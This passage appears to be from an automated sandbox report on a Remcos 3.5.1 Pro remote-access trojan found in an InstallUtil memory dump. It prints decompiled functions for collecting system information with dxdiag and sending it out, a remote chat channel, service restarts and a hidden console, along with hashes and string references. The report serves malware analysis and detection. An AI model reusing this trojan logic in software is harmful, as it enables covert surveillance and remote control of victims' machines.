							_pop(_t69);
							_t77 = _t65;
						}
					} else {
						_t77 = 0x31;
					}
					E0043E110( &_v52, _t66, _t77);
					_t87 =  &(_t87[3]);
					_t8 = _t77 - 1; // -1
					_t78 =  ==  ? _t8 : _t77;
					_t67 = 0;
					 *((char*)(_t87 + ( ==  ? _t8 : _t77) + 0x24)) = 0;
					if(_v56 <= 0) {
						L16:
						_t79 = _v68;
					} else {
						_t80 = 0x462220;
						while(1) {
							_t12 = _t80 - 4; // 0x4677ec
							_t56 = E004386A0( &_v52,  *_t12, 0x31);
							_t87 =  &(_t87[3]);
							if(_t56 == 0) {
								break;
							}
							_t64 = E004386A0( &_v52,  *_t80, 0x31);
							_t87 =  &(_t87[3]);
							if(_t64 == 0) {
								break;
							}
							_t67 = _t67 + 1;
							_t80 = _t80 + 0xc;
							if(_t67 < _v56) {
								continue;
							}
							goto L16;
						}
						_t73 = _v64;
						if(_t73 >= 0x12b) {
							goto L33;
						}
						_t79 = _v68;
						_t69 = _t67 * 0xc;
						 *((char*)(_t79 + _t73 + 4)) =  *((intOrPtr*)(_t69 + 0x462224));
						 *((char*)(_t79 + _t73 + 5)) =  *((intOrPtr*)(_t69 + 0x462225));
						_t59 =  *((intOrPtr*)(_t69 + 0x462224));
						_v64 = _t73 + 2;
						if(_t59 == 0x13) {
							L30:
							_v72 = 1;
							L31:
							_t83 = 1;
							goto L17;
						}
						if(_t59 != 0xc0) {
							L26:
							if(_v72 != 0) {
								L28:
								if(_v60 == 0) {
									_v60 = 1;
								}
								goto L31;
							}
							_t61 = E00435320( &_v52, "ECDSA");
							_pop(_t69);
							if(_t61 != 0) {
								goto L30;
							}
							goto L28;
						}
						_t62 =  *((intOrPtr*)(_t69 + 0x462225));
						if(_t62 == 0xb4 || _t62 == 0xb5) {
							goto L30;
						} else {
							goto L26;
						}
					}
					L17:
					_t81 = _t82 + 1;
				} while (_t82 != 0);
				if(_t83 != 0) {
					_push(_t69);
					 *_t79 = _v64;
					 *((char*)(_t79 + 0x154)) = 1;
					E0041A312(_t79, _v72, _v60, _t69, 1);
				}
				return _t83;
			}

0x0041ce07
0x0041ce0b
0x0041ce0f
0x0041ce13
0x0041ce17
0x0041ce20
0x0041ce24
0x0041ce2b
0x0041cfce
0x00000000
0x0041cfce
0x0041ce39
0x0041ce3e
0x0041ce43
0x0041cfc9
0x00000000
0x0041cfcb
0x0041ce51
0x0041ce56
0x0041ce5b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ce61
0x0041ce61
0x0041ce67
0x0041ce6e
0x0041ce71
0x0041ce74
0x0041ce81
0x0041ce76
0x0041ce77
0x0041ce7c
0x0041ce7c
0x0041ce86
0x0041ce8f
0x0041ce9e
0x0041ce91
0x0041ce92
0x0041ce97
0x0041ce98
0x0041ce98
0x0041ce88
0x0041ce8a
0x0041ce8a
0x0041cea7
0x0041ceac
0x0041ceaf
0x0041ceb5
0x0041ceb8
0x0041ceba
0x0041cec3
0x0041ceff
0x0041ceff
0x0041cec5
0x0041cec5
0x0041ceca
0x0041cecc
0x0041ced4
0x0041ced9
0x0041cede
0x00000000
0x00000000
0x0041cee9
0x0041ceee
0x0041cef3
0x00000000
0x00000000
0x0041cef5
0x0041cef6
0x0041cefd
0x00000000
0x00000000
0x00000000
0x0041cefd
0x0041cf3e
0x0041cf48
0x00000000
0x00000000
0x0041cf4e
0x0041cf52
0x0041cf5b
0x0041cf65
0x0041cf6c
0x0041cf72
0x0041cf78
0x0041cfb9
0x0041cfb9
0x0041cfc1
0x0041cfc3
0x00000000
0x0041cfc3
0x0041cf7c
0x0041cf8c
0x0041cf91
0x0041cfa8
0x0041cfad
0x0041cfaf
0x0041cfaf
0x00000000
0x0041cfad
0x0041cf9d
0x0041cfa3
0x0041cfa6
0x00000000
0x00000000
0x00000000
0x0041cfa6
0x0041cf7e
0x0041cf86
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cf86
0x0041cf03
0x0041cf05
0x0041cf06
0x0041cf10
0x0041cf1a
0x0041cf1e
0x0041cf28
0x0041cf2f
0x0041cf34
0x00000000

APIs

_strstr.LIBCMT ref: 0041CE69
_strlen.LIBCMT ref: 0041CE77
_strlen.LIBCMT ref: 0041CE92
_strncpy.LIBCMT ref: 0041CEA7
_strstr.LIBCMT ref: 0041CF9D

Strings

ECDSA, xrefs: 0041CF97
DEFAULT, xrefs: 0041CE4B
TLS_AES_128_GCM_SHA256, xrefs: 0041CE24, 0041CE38, 0041CE50, 0041CE66, 0041CE76, 0041CE91, 0041CEA5
ALL, xrefs: 0041CE33

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _strlen_strstr$_strncpy
String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
API String ID: 3390399981-1012175531
Opcode ID: 6bb8123dc9140045cddffba2b3aafdd2df29b84b76c6b952785370a766b1167b
Instruction ID: 859e8405bce250f7c3cf1f5e5d7944e35ec7c8a1934b8ee426a9c6d520d10168
Opcode Fuzzy Hash: 6bb8123dc9140045cddffba2b3aafdd2df29b84b76c6b952785370a766b1167b
Instruction Fuzzy Hash: 985169726883015ED3209E249C85BABB7D69B98318F14492FF88487281E37DC997C79F

Uniqueness

Uniqueness Score: -1.00%

Function 00405477 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00405477(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t126 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E004020B6(_t69,  &_v104, __edx, __eflags, _t69 + 0xc);
				SetEvent( *(_t69 + 0x24));
				_t28 = E00401F6B( &_v108);
				E00404162( &_v108,  &_v60, 4, 0xffffffff);
				_t121 = (_t118 & 0xfffffff8) - 0x5c;
				E004020B6(_t69, _t121, _t101, _t126, 0x46e260);
				_t122 = _t121 - 0x18;
				E004020B6(_t69, _t122, _t101, _t126,  &_v76);
				E0041851D( &_v140, _t101);
				_t123 = _t122 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					E00401E25( &_v116, _t101, _t117, __eflags, 0);
					_t36 = E0040243C();
					E00401F6B(E00401E25( &_v120, _t101, _t117, __eflags, 0));
					_t101 = _t36;
					_t113 = E0040F872();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						E00401E4D( &_v116, _t101);
						E00401F98();
						E00401F98();
						__eflags = 0;
						return 0;
					}
					 *0x46dae0 = E0040FAE7(_t113, "DisplayMessage");
					_t45 = E0040FAE7(_t113, "GetMessage");
					_t104 = "CloseChat";
					 *0x46dad8 = _t45;
					_t46 = E0040FAE7(_t113, "CloseChat");
					_t124 = _t123 - 0x18;
					 *0x46dadc = _t46;
					 *0x46dad5 = 1;
					E004020B6(_t69, _t124, "CloseChat", __eflags, 0x46e2f8);
					_push(0x74);
					E00404A78(_t69, _t104, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x46dad8(_t115,  &_v140);
					if(__eflags != 0) {
						_t124 = _t124 - 0x18;
						E00402077(_t69, _t124, _t104, _t117, __eflags, _v140, _t51);
						_push(0x3b);
						E00404A78(_t69, _t104, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t128 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x46dae0(E00401F6B(E00401E25( &_v116, _t101, _t117, _t128, 0)));
				_t129 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E0040413E(_t69,  &_v80, _t101, _t117, 0x461080);
				_t101 =  &_v84;
				E00418445(_t69, _t123 - 0x18,  &_v84);
				_push(0x3b);
				E00404A78(_t69,  &_v84, _t129);
				E00401EC9();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

0x00405477
0x00405477
0x00405485
0x0040548e
0x00405496
0x004054a0
0x004054b4
0x004054b9
0x004054c3
0x004054c8
0x004054d2
0x004054db
0x004054e0
0x004054e3
0x004054e6
0x00405595
0x0040559c
0x004055af
0x004055b4
0x004055bd
0x004055bf
0x004055c1
0x0040556a
0x0040556e
0x00405577
0x00405580
0x00405587
0x0040558d
0x0040558d
0x004055d4
0x004055db
0x004055e0
0x004055e5
0x004055ec
0x004055f1
0x004055f4
0x004055fb
0x00405607
0x0040560c
0x00405610
0x00405615
0x0040561e
0x0040562e
0x00405630
0x00405632
0x0040563c
0x00405641
0x00405645
0x00405650
0x00405650
0x00000000
0x00405630
0x004054ec
0x004054ef
0x00000000
0x00000000
0x00405505
0x0040550c
0x0040550e
0x00000000
0x00000000
0x00405519
0x00405521
0x00405527
0x0040552c
0x00405530
0x00405539
0x00000000
0x0040553e
0x00405555
0x00405560
0x00405560
0x00405568
0x00000000
0x00000000
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 00405496
GetMessageA.USER32 ref: 00405546
TranslateMessage.USER32(?), ref: 00405555
DispatchMessageA.USER32 ref: 00405560
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046E2F8), ref: 00405618
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405650

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

Strings

CloseChat, xrefs: 004055E0
DisplayMessage, xrefs: 004055C3
GetMessage, xrefs: 004055CF

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: f6524e1648d4de4095ce36fbc337c73dc48f34eac38669dfa5b6b18361cf6ba2
Instruction ID: 50b24cc1a81940f1b5dd5029fae4e8300528e881efd1fe54cb18f3561050ea4e
Opcode Fuzzy Hash: f6524e1648d4de4095ce36fbc337c73dc48f34eac38669dfa5b6b18361cf6ba2
Instruction Fuzzy Hash: 0C41C431A083415BCB14FB76DC5A86F77A9ABC5708F40093EF912A71E1EF388905CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00414430 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 104
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00414430(void* __ecx, void* __edx, void* __edi, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v204;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t93;

				_t95 = __eflags;
				_t90 = __edi;
				E00402FD4(_t54,  &_v76, E0040413E(_t54,  &_v52, __edx, _t92, E00438A0F(_t54, __ecx, __eflags, L"temp")), _t90, _t92, _t95, L"\\sysinfo.txt");
				E00401EC9();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", E00401EC4(E0040A01F( &_v52, L"/t ", _t92,  &_v76)), 0, 0);
				E00401EC9();
				E0040209F(0,  &_v28);
				_t91 = 0;
				do {
					E00401EC4( &_v76);
					_t88 =  &_v28;
					E004189A5( &_v28);
					Sleep(0x64);
					_t91 = _t91 + 1;
				} while (E00409F76() != 0 && _t91 < 0x4b0);
				if(E00409F76() == 0) {
					DeleteFileW(E00401EC4( &_v76));
					E004046B7( &_v204, _t92, 1);
					_t46 = E0040489F( &_v204, _t91,  &_v204);
					_t100 = _t46;
					if(_t46 != 0) {
						_t91 = _t93 - 0x18;
						_t16 =  &_a4; // 0x413fe7
						_t88 = E00402EF1( &_v52, _t16, _t92, 0x46e260);
						E00402ED0(_t55, _t93 - 0x18, _t49, _t92, _t100,  &_v28);
						_push(0x97);
						E00404A78( &_v204, _t49, _t100);
						E00401F98();
						E00404DFD(_t49);
						_t55 = 1;
					}
					E00404EB9(_t55,  &_v204, _t88, _t91);
				}
				E00401F98();
				E00401EC9();
				E00401F98();
				return _t55;
			}

0x00414430
0x00414430
0x00414459
0x00414462
0x00414467
0x00414490
0x00414499
0x004144a1
0x004144a6
0x004144a8
0x004144ab
0x004144b0
0x004144b5
0x004144bc
0x004144c5
0x004144cb
0x004144e1
0x004144f0
0x004144fe
0x0041450a
0x0041450f
0x00414511
0x00414519
0x0041451b
0x0041452d
0x00414531
0x00414537
0x00414542
0x0041454a
0x00414555
0x0041455a
0x0041455a
0x00414562
0x00414562
0x0041456a
0x00414572
0x0041457a
0x00414586

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00414490

Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE

Sleep.KERNEL32(00000064), ref: 004144BC
DeleteFileW.KERNEL32(00000000), ref: 004144F0

Strings

/t , xrefs: 0041446F
?A, xrefs: 00414577, 0041451B
temp, xrefs: 00414440
open, xrefs: 0041448A
dxdiag, xrefs: 00414485
\sysinfo.txt, xrefs: 0041443B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp$?A
API String ID: 1462127192-522105993
Opcode ID: 07e4f663946d65be398ffbd40286491c131c561b2fed13d89b1c0f123ac5eda8
Instruction ID: 9492f98b08e5c5c357063eda817348553446c523427aff16ffafa97b72869cf5
Opcode Fuzzy Hash: 07e4f663946d65be398ffbd40286491c131c561b2fed13d89b1c0f123ac5eda8
Instruction Fuzzy Hash: 703180719102185ACB08FBA1DC96DEE7764AF50308F00007FF906771E2EF381D8ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 00419F77 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00419F77(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				struct HWND__* _t11;
				void* _t30;
				void* _t35;
				void* _t36;
				void* _t37;

				_t35 = __edi;
				_t32 = __ecx;
				_t36 = _t37 - 0x78;
				_t30 = __ecx;
				AllocConsole();
				_t11 =  *0x46ecb0(__ebx);
				_t41 = _t30;
				 *0x46deb4 = _t11;
				if(_t30 == 0) {
					ShowWindow(_t11, 0);
				}
				E0043DFD9(_t32, "CONOUT$", "a", E0043956E(1));
				E004337A0(_t35, _t36 - 0x50, 0, 0xc8);
				E0043E020(_t36 - 0x50, "--------------------------\n");
				E0043E020(_t36 - 0x50, " * Remcos v");
				E0043E020(_t36 - 0x50, "3.5.1 Pro");
				E0043E020(_t36 - 0x50, "\n * BreakingSecurity.net\n");
				E0043E020(_t36 - 0x50, "--------------------------\n\n");
				_push(_t36 - 0x50);
				return E00417B70(_t41);
			}

0x00419f77
0x00419f77
0x00419f78
0x00419f83
0x00419f85
0x00419f8b
0x00419f91
0x00419f93
0x00419f99
0x00419f9e
0x00419f9e
0x00419fb6
0x00419fc6
0x00419fd4
0x00419fe2
0x00419ff0
0x00419ffe
0x0041a00c
0x0041a017
0x0041a022

APIs

AllocConsole.KERNEL32(00000001), ref: 00419F85
GetConsoleWindow.KERNEL32 ref: 00419F8B
ShowWindow.USER32(00000000,00000000), ref: 00419F9E

Strings

* BreakingSecurity.net, xrefs: 00419FF8
--------------------------, xrefs: 0041A006
CONOUT$, xrefs: 00419FB1
--------------------------, xrefs: 00419FCE
3.5.1 Pro, xrefs: 00419FEA
* Remcos v, xrefs: 00419FDC

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ConsoleWindow$AllocShow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.5.1 Pro$CONOUT$
API String ID: 3461962499-3463560965
Opcode ID: 3dc36d18dec3417e34489f19bbd5f9285a6577b791add2ccac7cbf19b1364e0d
Instruction ID: dd5034e40d5e62cdb4a5cc15f6e42495c228d7269276c1949c1d7be5665b3ad0
Opcode Fuzzy Hash: 3dc36d18dec3417e34489f19bbd5f9285a6577b791add2ccac7cbf19b1364e0d
Instruction Fuzzy Hash: 890125B19853186ADB10BBF1DD46FDE77BC6B0870AF54141BF110A70D2EAECA148462E

Uniqueness

Uniqueness Score: -1.00%

Function 0041738B Relevance: 15.1, APIs: 10, Instructions: 66
serviceCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041738B(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, E00401EC4( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				E00401EC9();
				return _t22;
			}

0x00417396
0x004173a8
0x004173b7
0x004173bb
0x004173d5
0x004173e7
0x004173ec
0x004173f2
0x004173fb
0x0041740a
0x0041740f
0x00417412
0x00417415
0x004173d7
0x004173de
0x004173e1
0x004173e3
0x004173e3
0x004173bd
0x004173be
0x004173be
0x0041741a
0x00417427

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00416D04,00000000), ref: 0041739A
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00416D04,00000000), ref: 004173B1
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416D04,00000000), ref: 004173BE
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00416D04,00000000), ref: 004173CD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416D04,00000000), ref: 004173DE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416D04,00000000), ref: 004173E1

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 8075aaf96f24b09abf3fe96909d2938f6295a241c5dc891494a6c2ca102c6517
Instruction ID: b565da2570de756faa497913c3aa2cbeda0fd235e416a951b4a5e1d22870c777
Opcode Fuzzy Hash: 8075aaf96f24b09abf3fe96909d2938f6295a241c5dc891494a6c2ca102c6517
Instruction Fuzzy Hash: 6211063194431CABC711AB64DC84CFF3B7CDB85BAAB100036FE05961C1DB28CC86A6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00444161 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00444161(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x4582c0) {
					E004427C2(_t52);
					_t26 = _a4;
				}
				E004427C2( *((intOrPtr*)(_t26 + 0x3c)));
				E004427C2( *((intOrPtr*)(_a4 + 0x30)));
				E004427C2( *((intOrPtr*)(_a4 + 0x34)));
				E004427C2( *((intOrPtr*)(_a4 + 0x38)));
				E004427C2( *((intOrPtr*)(_a4 + 0x28)));
				E004427C2( *((intOrPtr*)(_a4 + 0x2c)));
				E004427C2( *((intOrPtr*)(_a4 + 0x40)));
				E004427C2( *((intOrPtr*)(_a4 + 0x44)));
				E004427C2( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00444027(5,  &_v8);
				_v8 =  &_a4;
				return E00444077(4,  &_v8);
			}

0x00444167
0x0044416a
0x00444172
0x00444175
0x0044417a
0x0044417d
0x00444181
0x0044418c
0x00444197
0x004441a2
0x004441ad
0x004441b8
0x004441c3
0x004441ce
0x004441dc
0x004441e4
0x004441ed
0x004441f5
0x00444209

APIs

_free.LIBCMT ref: 00444175

Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA

_free.LIBCMT ref: 00444181
_free.LIBCMT ref: 0044418C
_free.LIBCMT ref: 00444197
_free.LIBCMT ref: 004441A2
_free.LIBCMT ref: 004441AD
_free.LIBCMT ref: 004441B8
_free.LIBCMT ref: 004441C3
_free.LIBCMT ref: 004441CE
_free.LIBCMT ref: 004441DC

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d989b8b8f4764be2eabf03f7fa6b03dc5a8668e2bc9c861313d94e6db9b20cf2
Instruction ID: 723cca80dea696d3e278b39cc018992024622c01c3a35b4f32945068e724164b
Opcode Fuzzy Hash: d989b8b8f4764be2eabf03f7fa6b03dc5a8668e2bc9c861313d94e6db9b20cf2
Instruction Fuzzy Hash: 0E11CB79200108BFDB01EF66C942DDD3BA5FF14754B4144AAFA484F222DB75DE50DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00441239 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E00441239(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00444255(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = E00440983(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E004421F7(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xcbd5
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E00443BA1(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E00438659();
									asm("int3");
									_t169 =  *0x46d508; // 0x0
									return _t169;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = E00440690(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = E0044CE9D(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x4584c8, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E004338FA( &_v528,  *0x46c160, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x458408; // 0x40df7b
									 *0x4544b0(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x46c298;
										if(_t228 != 0x46c298) {
